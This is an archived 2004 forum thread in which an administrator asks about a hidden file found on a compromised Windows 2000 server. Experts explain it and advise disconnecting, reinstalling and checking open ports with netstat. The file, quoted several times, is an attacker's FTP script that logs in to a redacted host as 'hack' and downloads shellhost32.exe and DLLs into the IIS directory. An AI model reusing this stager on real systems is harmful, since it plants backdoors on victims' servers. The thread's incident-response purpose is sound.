One of my W2K servers hacked?

TheMSsForum.com: The Microsoft Software Forum

I inherited servers : W2K, W2003, no, no SBS in this network.
Can i still ask the question here?

I was browsing one W2K server and i found a hidden folder in C: Drive
called "x", with a file in it called "x.txt"

Opening this file shows:

open x.x.x.x 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye

Can someone please explain what the above does and how can i verify
if this hacker has left backdoors, trojan horses etc...?

Running Windows Update on this server shows me 38 or 39 Critical Updates.
Is there good documentation out there that explains running Windows Update
is actually a good thing to do rather than bad. A management person is
asking
me to test each critical update before i apply it on the production server.

Also, i am trying to look for real facts on upgrading to W2003 servers and
IIS6.0
rather than using W2K and IIS5. Are there any white papers or other
documentation
that can help me make this case?

I would appreciate any help, info, ...

Thank you very much
Top

Re: One of my W2K servers hacked? by Marina

Marina
Thu Nov 11 18:41:27 CST 2004

Hi Serge,

If this server is hacked, you want to disconnect if from the internet now!
You don't update, you reinstall from scratch. The other server and clients
might be hacked too. If you run a netstat, which ports are open? If there is
a port 21 and/or 80, forget the whole thing and reinstall.

--
Regards,

Marina
Microsoft SBS-MVP

"serge" <sergea@nospam.ehmail.com> schreef in bericht
news:j5Tkd.46986$km5.1770558@news20.bellglobal.com...
> I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?
>
> Running Windows Update on this server shows me 38 or 39 Critical Updates.
> Is there good documentation out there that explains running Windows Update
> is actually a good thing to do rather than bad. A management person is
> asking
> me to test each critical update before i apply it on the production
server.
>
> Also, i am trying to look for real facts on upgrading to W2003 servers and
> IIS6.0
> rather than using W2K and IIS5. Are there any white papers or other
> documentation
> that can help me make this case?
>
> I would appreciate any help, info, ...
>
> Thank you very much
>
>
>
>
>
>


Top

Re: One of my W2K servers hacked? by Kevin

Kevin
Thu Nov 11 23:08:10 CST 2004

What? Are you really asking whether it's a good or bad idea to apply
critical security patches to a server? And then someopne's asking you to
test each critical patch before installing it on a server that has been
hacked and is no longer trustworthy?

It's up to you whether you want to take on this job for this customer of
yours, but if you do -- you tell them that the only acceptable solution is
to reformat and reload this server. Even the workstations attached should be
called into question, as well as all data files.

They are up to their neck in trouble!
--
Kevin Weilbacher [SBS-MVP]
"The days pass by so quickly now, the nights are seldom long"


"serge" <sergea@nospam.ehmail.com> wrote in message
news:j5Tkd.46986$km5.1770558@news20.bellglobal.com...
>I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?
>
> Running Windows Update on this server shows me 38 or 39 Critical Updates.
> Is there good documentation out there that explains running Windows Update
> is actually a good thing to do rather than bad. A management person is
> asking
> me to test each critical update before i apply it on the production
> server.
>
> Also, i am trying to look for real facts on upgrading to W2003 servers and
> IIS6.0
> rather than using W2K and IIS5. Are there any white papers or other
> documentation
> that can help me make this case?
>
> I would appreciate any help, info, ...
>
> Thank you very much
>
>
>
>
>
>


Top

Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 06:40:16 CST 2004

Thank you both.

There are no workstations but other servers exist.

Reinstalling the server and the other servers is not feasible at this
moment.
One of the first things i need to do is understand what that text of
"hacking" does, did
or can still do. I am also trying to figure out if there's a step-by-step
document that tells
you what to check/do from A to Z to see if you're hacked or not. Or a book
could be
very useful too.

Thanks again.


Top

Re: One of my W2K servers hacked? by Marina

Marina
Fri Nov 12 07:04:20 CST 2004

Hi Serge,

Use the netstat -an command to see what ports are open and post that here.

--
Regards,

Marina
Microsoft SBS-MVP

"serge" <sergea@nospam.ehmail.com> schreef in bericht
news:Qa2ld.47577$km5.1999803@news20.bellglobal.com...
> Thank you both.
>
> There are no workstations but other servers exist.
>
> Reinstalling the server and the other servers is not feasible at this
> moment.
> One of the first things i need to do is understand what that text of
> "hacking" does, did
> or can still do. I am also trying to figure out if there's a step-by-step
> document that tells
> you what to check/do from A to Z to see if you're hacked or not. Or a book
> could be
> very useful too.
>
> Thanks again.
>
>


Top

Re: One of my W2K servers hacked? by Alexander

Alexander
Fri Nov 12 08:25:52 CST 2004

serge wrote:

> I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?

This appears to me as FTP commands. Did you replace the IP address in the
file with x.x.x.x? In principle, these are the commands that you need to
copy the listed files from the server x.x.x.x:33333, logging in as user
hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
If there is a webserver running, it is possible that these files are
accessible from the internet.

As a first step you should remove these files, if they exist, from this
directory. Do not delete them, you might want to analyze them (e.g. a virus
scanner could be able to tell you which virus/trojan/backdoor it is).

It definitely is an idea to scan the full harddisk with a virus scanner.
This should be done by booting from a clean disk, e.g. a bootable CD with a
virus scanner (don't forget to update the signatures). But if this scanner
does not find anything, you are not necessarily free of any backdoors.

And, as Marina and Kevin suggested, run netstat to look for any open ports.

But if there is only the slightest hint that the system was compromised, you
have to remove the server from the internet immediately and reinstall as
soon as possible.

Regards, Alex

Top

Re: One of my W2K servers hacked? by Dave

Dave
Fri Nov 12 10:57:12 CST 2004

You may want to consider this article from security guru Jesper Johansson:

Help: I Got Hacked. Now What Do I Do?
http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx


"serge" <sergea@nospam.ehmail.com> wrote in message
news:Qa2ld.47577$km5.1999803@news20.bellglobal.com...
> Thank you both.
>
> There are no workstations but other servers exist.
>
> Reinstalling the server and the other servers is not feasible at this
> moment.
> One of the first things i need to do is understand what that text of
> "hacking" does, did
> or can still do. I am also trying to figure out if there's a step-by-step
> document that tells
> you what to check/do from A to Z to see if you're hacked or not. Or a book
> could be
> very useful too.
>
> Thanks again.
>
>


Top

Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:12:35 CST 2004

Hi Marina,

> Use the netstat -an command to see what ports are open and post that here.

Here it is:


Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1032 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1039 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1120 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1560 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1566 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2735 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2736 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2737 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2739 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2745 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2746 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2751 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2752 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2753 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2755 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2756 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2757 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2759 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2760 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2761 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3335 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3372 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3580 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3906 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4240 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4280 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4295 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4365 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4408 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4409 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4507 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4641 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4783 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4810 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4815 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5168 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5169 0.0.0.0:0 LISTENING
TCP 0.0.0.0:55462 0.0.0.0:0 LISTENING
TCP 10.10.12.1:80 10.10.12.240:4409 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4420 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4429 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4443 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:53433 ESTABLISHED
TCP 10.10.12.1:139 0.0.0.0:0 LISTENING
TCP 10.10.12.1:1120 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2735 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2736 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2737 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2739 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2745 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2746 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2751 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2752 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2753 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2755 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2756 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2757 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2759 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2760 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2761 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:3335 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:3389 10.10.12.201:21463 ESTABLISHED
TCP 10.10.12.1:3906 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4240 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4280 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4295 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4365 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4408 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4409 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4507 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4641 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4783 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4805 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4807 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4808 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4809 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4810 10.10.12.202:445 ESTABLISHED
TCP 10.10.12.1:4813 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4814 10.10.12.202:135 TIME_WAIT
TCP 10.10.12.1:4815 10.10.12.202:1025 ESTABLISHED
TCP 10.10.12.1:4821 10.10.12.202:135 TIME_WAIT
TCP 10.10.12.1:4822 10.10.12.202:1025 TIME_WAIT
TCP 10.10.12.1:4828 10.10.12.59:1433 TIME_WAIT
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1945 *:*
UDP 0.0.0.0:1993 *:*
UDP 0.0.0.0:3456 *:*
UDP 0.0.0.0:4824 *:*
UDP 0.0.0.0:7900 *:*
UDP 0.0.0.0:8998 *:*
UDP 10.10.12.1:137 *:*
UDP 10.10.12.1:138 *:*
UDP 10.10.12.1:500 *:*
UDP 10.10.12.2:500 *:*


Thank you



Top

Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:13:55 CST 2004

Will check the link, Thanks!

> You may want to consider this article from security guru Jesper Johansson:
>
> Help: I Got Hacked. Now What Do I Do?
> http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx



Top

Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:17:24 CST 2004


"Alexander Mattausch" <Alexander.Mattausch@physik.uni-erlangen.de> wrote in
message news:2vjvfjF2mu0peU1@uni-berlin.de...
> serge wrote:
>
>> I inherited servers : W2K, W2003, no, no SBS in this network.
>> Can i still ask the question here?
>>
>> I was browsing one W2K server and i found a hidden folder in C: Drive
>> called "x", with a file in it called "x.txt"
>>
>> Opening this file shows:
>>
>> open x.x.x.x 33333
>> USER hack
>> hack
>> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
>> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
>> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
>> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
>> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
>> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
>> bye
>>
>> Can someone please explain what the above does and how can i verify
>> if this hacker has left backdoors, trojan horses etc...?
>
> This appears to me as FTP commands. Did you replace the IP address in the
> file with x.x.x.x? In principle, these are the commands that you need to
> copy the listed files from the server x.x.x.x:33333, logging in as user
> hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
> If there is a webserver running, it is possible that these files are
> accessible from the internet.

I see one file only in c:\winnt\system32\inetsrv\data\shellhost32.exe
with 0 bytes, that's good, that means the file wasn't created. Don't ask me
to explain what a 0 bytes file means because i don't know.
And i see a TMP folder created in the DATA folder but the TMP contains
no files. So it seems that the hacker was unable to create any files. This
can only
be a good thing.

> As a first step you should remove these files, if they exist, from this
> directory. Do not delete them, you might want to analyze them (e.g. a
> virus
> scanner could be able to tell you which virus/trojan/backdoor it is).

> It definitely is an idea to scan the full harddisk with a virus scanner.
> This should be done by booting from a clean disk, e.g. a bootable CD with
> a
> virus scanner (don't forget to update the signatures). But if this scanner
> does not find anything, you are not necessarily free of any backdoors.

I ran Trend Micro's HouseCall on the hard drives, no viruses were found.

> And, as Marina and Kevin suggested, run netstat to look for any open
> ports.

I posted the netstat results.

Thanks!


Top